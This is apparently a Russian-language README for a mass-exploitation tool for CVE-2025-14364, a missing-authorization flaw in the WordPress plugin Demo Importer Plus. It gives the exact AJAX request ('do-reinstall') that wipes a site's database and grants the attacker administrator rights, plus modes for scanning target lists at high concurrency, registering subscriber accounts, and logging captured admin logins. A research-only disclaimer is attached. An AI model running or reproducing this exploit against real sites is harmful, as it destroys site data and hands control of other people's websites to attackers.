
Demo Importer Plus <= 2.0.8 - Отсутствие авторизации для аутентифицированных (Subscriber+) сброс сайта и повышение привилегий
Demo Importer Plus <= 2.0.8 - Отсутствие проверки прав доступа к аутентифицированному (Подписчик+) сбросу сайта и повышению привилегий
_ _ _ _ _ _ _ _
/ \ / |_ __ ) / \ ) |_ __ /| |_|_ _) |_ |_|_
\_ \/ |_ / \_/ /_ _) | | _) |_) |
Аутентифицированный подписчик → Администратор через AJAX-действие
do-reinstall
Основная причина:
Ajax::handle_request() регистрирует AJAX-действие demo_importer_plus без вызова current_user_can(). Любой аутентифицированный подписчик может отправить {"demo_action":"do-reinstall"}, чтобы вызвать wp_install(), которая удаляет все таблицы базы данных (кроме users / usermeta) и повторно запускает установку WordPress — автоматически назначая роль администратора аккаунту атакующего в процессе.
Режим 1 — Диагностика
Проверка: DNS · /wp-login.php · /wp-admin/admin-ajax.php · REST /wp/v2/users
→ Определить живые цели WordPress
Режим 2 — Регистрация
POST /wp-login.php?action=register
→ Создать аккаунт подписчика
→ Письмо с активацией отправлено на почту
↳ ВЫ ДОЛЖНЫ нажать на ссылку в письме перед запуском режима 3
Режим 3 — Эксплуатация
POST /wp-login.php → Аутентификация как подписчик
GET /wp-admin/ → Извлечь wp-rest-nonce
POST /wp-admin/admin-ajax.php
action=demo_importer_plus
{"demo_action":"do-reinstall"} → Запустить полный сброс сайта
← Ответ: "Site has been reset successfully"
→ Аккаунт атакующего теперь имеет роль администратора
git clone https://github.com/Nxploited/CVE-2025-14364.git
cd CVE-2025-14364
pip install -r requirements.txt
python3 CVE-2025-14364.py
requirements.txt
aiohttp>=3.9.0
colorama>=0.4.6
urllib3>=1.26.0
Режим [1/2/3]: 1 = Диагностика 2 = Регистрация 3 = Эксплуатация
Файл целей: list.txt (один хост в строке)
Параллельность: по умолчанию 30, макс. 200
Тайм-аут: по умолчанию 10с
Формат файла целей — list.txt:
https://target1.com
target2.com
http://target3.com
Проверяет четыре конечные точки для каждого хоста и записывает чистые результаты.
Режим: 1
Вывод → diagnostics_results.txt · passed_targets.txt
Режим: 2
Email: [email protected]
Имя пользователя: Nxploited
Пароль: NxploitedSA
Проверьте свой почтовый ящик и нажмите ссылку активации перед запуском режима 3.
Вывод → register_results.txt
Режим: 3
Имя пользователя: Nxploited
Пароль: NxploitedSA
При успехе инструмент выводит:
[HH:MM:SS] SUCCESS "success":true,"message":"Site has been reset successfully" -> https://target.com
И записывает в exploit_results.txt:
https://target.com/wp-login.php site:... user:Nxploited pass:NxploitedSA type:admin
Уязвимый запрос:
POST /wp-admin/admin-ajax.php?action=demo_importer_plus HTTP/1.1
Content-Type: application/json
X-WP-Nonce: <extracted_nonce>
{"demo_action":"do-reinstall"}
Успешный ответ:
{"success": true, "data": {"message": "Site has been reset successfully"}}
Извлечение nonce — два запасных источника:
wpApiSettings.nonce (из кода страницы /wp-admin/)
elementorOneSettingsData.wpRestNonce (запасной)
Автор : Nxploited (Khaled Alenazi)
GitHub : https://github.com/Nxploited
Telegram : @KNxploited
ДАННОЕ ПРОГРАММНОЕ ОБЕСПЕЧЕНИЕ ВЫПУСКАЕТСЯ СТРОГО ДЛЯ ИССЛЕДОВАНИЙ В ОБЛАСТИ БЕЗОПАСНОСТИ И ОБРАЗОВАНИЯ.
Автор не несёт никакой ответственности за любые действия, совершённые с помощью этого инструмента
против систем, которыми оператор не владеет или на тестирование которых не имеет явного письменного
разрешения.
Несанкционированное использование против сторонних систем нарушает законы о компьютерных преступлениях
в большинстве юрисдикций (CFAA, CMA и аналогичные по всему миру) и может привести к уголовному
преследованию.
Только вы несёте ответственность за наличие законного разрешения перед запуском этого инструмента
против любой цели.
| CVE | CVE-2025-14364 |
| CVSS v3.1 | 8.8 HIGH — CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| CNA | Wordfence |
| Плагин | Demo Importer Plus |
| Затронутые версии | Все версии ≤ 2.0.8 |
| Необходимая аутентификация | Подписчик (самая низкая зарегистрированная роль) |
| Тип | Отсутствие проверки прав доступа → Полный сброс сайта → Повышение привилегий |
| CWE | CWE-862 · Missing Authorization |
| Файл | Содержимое |
|---|
diagnostics_results.txt | Полные результаты проверки в JSON для каждой цели |
passed_targets.txt | Чистые цели (ошибки не обнаружены) |
register_results.txt | Записи попыток регистрации |
exploit_results.txt | Логин · nonce · результаты сброса · подтверждённые попадания администратора |
reset_results.txt | Сырой ответ do-reinstall для каждой цели |